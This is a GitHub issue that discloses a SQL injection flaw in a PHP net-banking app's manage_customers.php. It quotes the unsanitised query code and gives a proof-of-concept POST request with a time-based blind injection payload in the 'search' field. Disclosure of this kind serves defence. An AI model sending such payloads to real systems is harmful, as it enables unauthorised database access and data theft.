You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
net-banking/manage_customers.php from line 11,The $_POST['search'] parameter is controllable, the parameter search can be passed through post, and the $search is not protected from sql injection, line 70 $result = $conn->query($sql0); made a sql query,resulting in sql injection
......
......
......
if (isset($_POST['submit'])) {
$back_button = TRUE;
$search = $_POST['search'];
$by = $_POST['by'];
if ($by == "name") {
$sql0 = "SELECT cust_id, first_name, last_name, account_no FROM customer WHERE first_name LIKE '%".$search."%' OR last_name LIKE '%".$search."%' OR CONCAT(first_name, ' ', last_name) LIKE '%".$search."%'";
}
else {
$sql0 = "SELECT cust_id, first_name, last_name, account_no FROM customer WHERE account_no LIKE '$search'";
}
}
......
......
......
<?php$result = $conn->query($sql0);
......
......
......
POC
POST /net-banking/manage_customers.php HTTP/1.1Host: www.bank.netUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedCookie: PHPSESSID=m5fjmb3r9rvk4i56cqc22ht3c3Content-Length: 16submit=&search=' AND (SELECT 4752 FROM (SELECT(SLEEP(5)))giHH)-- gbXY
Attack results pictures
The text was updated successfully, but these errors were encountered:
Vulnerability file address
net-banking/manage_customers.php
from line 11,The$_POST['search']
parameter is controllable, the parameter search can be passed through post, and the$search
is not protected from sql injection, line 70$result = $conn->query($sql0);
made a sql query,resulting in sql injectionPOC
Attack results pictures
The text was updated successfully, but these errors were encountered: